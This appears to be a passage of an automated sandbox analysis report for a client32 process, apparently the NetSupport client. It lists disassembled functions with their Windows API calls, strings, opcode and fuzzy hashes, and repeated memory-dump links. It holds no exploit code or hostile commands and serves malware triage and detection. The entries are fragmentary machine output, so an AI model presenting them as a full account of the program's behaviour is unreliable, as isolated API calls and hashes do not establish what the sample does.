Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ??CTL32.DLL
API String ID: 1029625771-2984404022
Opcode ID: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
Instruction ID: 40d8bc6ab88db45c32dcc04311cf02eaab8fe64a48e70e25efc52a4fcd913f6e
Opcode Fuzzy Hash: cc0ca063087fa356a0713f1d8e18f8b0dc33c2edb3546a523657c24588211f68
Instruction Fuzzy Hash: 0B31F371A04786DFEB10CF18DC40B5ABBE8FB46324F0182AAE918DB380E731A800C791

Function 110258A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetDriveTypeA.KERNEL32(?), ref: 110258CD

Strings

?:\, xrefs: 110258C2

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DriveType
String ID: ?:\
API String ID: 338552980-2533537817
Opcode ID: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
Instruction ID: 296434f9c912465af49bf9801cd890ec27f2c7e8f645fe9e776db7a9ee79c680
Opcode Fuzzy Hash: 8a1c97ff2a0bb620fb07ae8eb7adef0309c76a6bd9ef81c874dd3ea24fd5b682
Instruction Fuzzy Hash: 14F0B461C053D97AEB22CE6084445C6BFE84F07269F64C8DEE8DA96541E2F6E184CB91

Function 110E2140 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 32registryCOMMON

Download Yara Rule

APIs

Part of subcall function 110E2100: RegCloseKey.ADVAPI32(?,00000000,?,110E214D,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E210D

RegOpenKeyExA.KERNEL32(?,00000056,00000000,00020019,?,00000000,00000001,00000000,?,1102EA96,80000002,SOFTWARE\Policies\NetSupport\Client\standard,00020019,00000056,?,00000050), ref: 110E215C

Part of subcall function 110E1EE0: wvsprintfA.USER32(?,00020019,?), ref: 110E1F0B

Strings

Error %d Opening regkey %s, xrefs: 110E216A

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseOpenwvsprintf
String ID: Error %d Opening regkey %s
API String ID: 1772833024-3994271378
Opcode ID: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
Instruction ID: 3b3bc7d0e1a8f125228a4b9cdcbe5750d81a716439a92490548d771633bd724e
Opcode Fuzzy Hash: de06c068b6387fb7d03cac4f1ec7eec17ce79ab7c81d58fa8930de2aa0461511
Instruction Fuzzy Hash: B4E0927A7012183FD710961A9C84EEBBB5DDBD66A8F00002AFA0487341C971DD0082B0

Function 11135660 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(NSMTRACE,?,1102C5F4,110252E0,0261B6F0,?,?,?,00000100,?,?,00000009), ref: 11135679

Part of subcall function 111349D0: GetModuleHandleA.KERNEL32(NSMTRACE,11182A50), ref: 111349EA

Strings

NSMTRACE, xrefs: 11135674

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: HandleLibraryLoadModule
String ID: NSMTRACE
API String ID: 4133054770-4175627554
Opcode ID: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
Instruction ID: b1ad380a61c778eddec6c5cf27d69e9270adaa7b109430301fabde4c5aba83a6
Opcode Fuzzy Hash: 6b55861aefcc65c005b9025e5622ee65095013122b0b6ef497348b2382dd5a01
Instruction Fuzzy Hash: 4BD012766552178BCF555A59A458764F7A8A64551F3400479DC25D5608EB30E0008F50

Function 6CC63A70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,6CC67708), ref: 6CC63A78

Strings

psapi.dll, xrefs: 6CC63A71

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: 00b72ed0d3e9e539d5b130f684633425155c2f3c52aa7bfe8f1db03d5b239fac
Instruction ID: c91cf78ccabae6fc9f4b0c41fecb602a43b205fd35a3831f8ded1b77922b3f40
Opcode Fuzzy Hash: 00b72ed0d3e9e539d5b130f684633425155c2f3c52aa7bfe8f1db03d5b239fac
Instruction Fuzzy Hash: DBE001B1A01B108F83B0DF3AA404642BAF0BB196103118E6ED0DED3B00F730A5458F80

Function 11024B20 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(psapi.dll,?,1102E824), ref: 11024B28

Strings

psapi.dll, xrefs: 11024B21

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: psapi.dll
API String ID: 1029625771-80456845
Opcode ID: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
Instruction ID: a49634711d735b4a264a9b105b6216e45b9c68ec107dc904bdc89f91bbe56f72
Opcode Fuzzy Hash: b279cfa9485dd3d843c5fad48a844f53d245e61bccd7eeaeb87f5d1cde24b26e
Instruction Fuzzy Hash: 43E009B1901B108FC3B0CF3A9844642BBF0FB086503118E3EE0AEC3A00E330A548CF90

Function 1105B4C0 Relevance: 3.2, APIs: 2, Instructions: 169COMMON

Download Yara Rule

APIs

Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7

std::exception::exception.LIBCMT ref: 1105B563
__CxxThrowException@8.LIBCMT ref: 1105B578

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID:
API String ID: 1338273076-0
Opcode ID: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
Instruction ID: dbfd585634f4dcca31f1a65116c528cbeeec74a75ffab873033d2eb26059fac1
Opcode Fuzzy Hash: 1b5560830ccb74d44574dce0668a09696c272e29ec4a79bf687cb658f92f3a9e
Instruction Fuzzy Hash: 1F51BF76A00649AFCB44CF58D840E9AFBE9EF49314F14856EEC199B340D775F900CBA0

Function 1106F8F0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106F94F
FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11182201,?), ref: 1106F9B9

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FreeLibrary_memset
String ID:
API String ID: 1654520187-0
Opcode ID: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
Instruction ID: b4d7e124ec2e4c11198bc400b01424f54d7072c10aa60f823e9ba30096ca7848
Opcode Fuzzy Hash: 236fcb1ff3e935db34e9d19d6ac7a4d3679b670c088639da643021d7e105519a
Instruction Fuzzy Hash: BD218676E0021CA7D710DE95DC40BDFFBACFB59350F4045AAE90997200D7315A55CBE1

Function 6CC64750 Relevance: 3.1, APIs: 2, Instructions: 66COMMON

Download Yara Rule

APIs

ioctlsocket.WSOCK32(933554B7,4004667F,00000000,-000391A4), ref: 6CC647DF
select.WSOCK32(00000001,?,00000000,?,00000000,933554B7,4004667F,00000000,-000391A4), ref: 6CC64822

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: ioctlsocketselect
String ID:
API String ID: 1457273030-0
Opcode ID: fb1e9c4e398938a33364b56ea208add8edfd6ee5a32be6e226d86aeb409e4643
Instruction ID: ec8ff0d25212d1f4b7f0a4a5e245893256764c51b941efe6b24b0bbf4f05a88b
Opcode Fuzzy Hash: fb1e9c4e398938a33364b56ea208add8edfd6ee5a32be6e226d86aeb409e4643
Instruction Fuzzy Hash: 85211271A012189FEB28CF54C994BDEB7B9EF49304F0081DAE90D97685DB745B94CF90

Function 1105A560 Relevance: 3.0, APIs: 2, Instructions: 47COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1105A5A6
_memmove.LIBCMT ref: 1105A5B1

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _malloc_memmove
String ID:
API String ID: 1183979061-0
Opcode ID: a828f745c350ad28d1b09b9117ba3cbdf7d1e33501fbbb94a73341f121c7b494
Instruction ID: 6b2ba473f0f9fecf01fc659cc140292f3dfe021f1a80db6f3ab8bc208d22101f
Opcode Fuzzy Hash: a828f745c350ad28d1b09b9117ba3cbdf7d1e33501fbbb94a73341f121c7b494
Instruction Fuzzy Hash: 5DF0A479A00252AF97818F2D9844C97BBDCDF4A15C30484A6F955CB312D631ED0587E0

Function 11082CA0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 11082CBF
InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106B543,00000000,00000000,1117066E,000000FF), ref: 11082D30

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection_memset
String ID:
API String ID: 453477542-0
Opcode ID: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
Instruction ID: 47d3f0b7005f24d88c5ba47056aa192fd225d793499904ccbf0e969ed53c4eab
Opcode Fuzzy Hash: 816619bd5292480784461fccd4379953b6d04930cd08cba2fa59dc4f2141ea10
Instruction Fuzzy Hash: 721157B1901B048FC3A4CF7A88817C7FBE5BB49311F80892E95EEC2200DB716560CF90

Function 11133890 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111338B1
ExtractIconExA.SHELL32(?,00000000,0004048B,00010491,00000001), ref: 111338E8

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExtractFileIconModuleName
String ID:
API String ID: 3911389742-0
Opcode ID: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
Instruction ID: d4a943c9381133178395c29230453ef0d97f3a1f5bc1fa0403f3ff13df378306
Opcode Fuzzy Hash: 336059a513dda44203e69ba7318e9ebe477f3c8b73331cb78105c2dcabdbca92
Instruction Fuzzy Hash: 54F0B479A041186FEB08DF60CC9BFBDF3A8E784708F80C66DED52961C4CEB029448B40

Function 111522A1 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 11157CCF: __getptd_noexit.LIBCMT ref: 11157CCF

__lock_file.LIBCMT ref: 111522E8

Part of subcall function 11159979: __lock.LIBCMT ref: 1115999E

__fclose_nolock.LIBCMT ref: 111522F3

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.000000001120E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011210000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011213000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011215000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011241000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.0000000011332000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
Instruction ID: b4dba51b1251756d021d203fd4787ec9a19dcc6820a565d6ebdbe948f49b8c94
Opcode Fuzzy Hash: c6b8653c850ed822458d0e8f4dbe2789ca03e628ce26c4628c0bda2659fbdc38
Instruction Fuzzy Hash: BBF0903A811607DEDBD09B7588007DEFBA09F0333CF108344E438AA1D0DB786A429F56

Function 6CC64E60 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON

Download Yara Rule

APIs

WSACancelBlockingCall.WSOCK32 ref: 6CC64E69
Sleep.KERNEL32(00000032), ref: 6CC64E73

Memory Dump Source

Source File: 00000003.00000002.4454008542.000000006CC61000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC60000, based on PE: true

Associated: 00000003.00000002.4453991803.000000006CC60000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454042754.000000006CC9E000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454061749.000000006CCA7000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCA8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454077712.000000006CCAC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.4454111296.000000006CCAF000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6cc60000_client32.jbxd

Similarity

API ID: BlockingCallCancelSleep
String ID:
API String ID: 3706969569-0
Opcode ID: 98c7b192959addf2663745fa36af1811ad5689297a863635664eef52e9ff85a2
Instruction ID: d7ab8b1789d1dc95af4e99e2e3f6cd642c1c196013d67eca4494fa4231d9ce06
Opcode Fuzzy Hash: 98c7b192959addf2663745fa36af1811ad5689297a863635664eef52e9ff85a2
Instruction Fuzzy Hash: 3CB0926039220086AA4096B20EA82AAB5A9BB4524AFA09C64E940C5E85FF20C124E161

Function 11134260 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 11134180: ExpandEnvironmentStringsA.KERNEL32(75A7795C,?,00000104,75A7795C), ref: 111341A7

Part of subcall function 111524D7: __fsopen.LIBCMT ref: 111524E4

GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11134295
Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 111342A5

Memory Dump Source

Source File: 00000003.00000002.4453609467.0000000011001000.00000020.00000001.01000000.00000004.sdmp, Offset: 11000000, based on PE: true

Associated: 00000003.00000002.4453594023.0000000011000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453711288.0000000011181000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111CD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453748954.00000000111DC000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.4453784201.00000000111E1000.00000002.00000001.01000000.00000004.sdmpDownload File
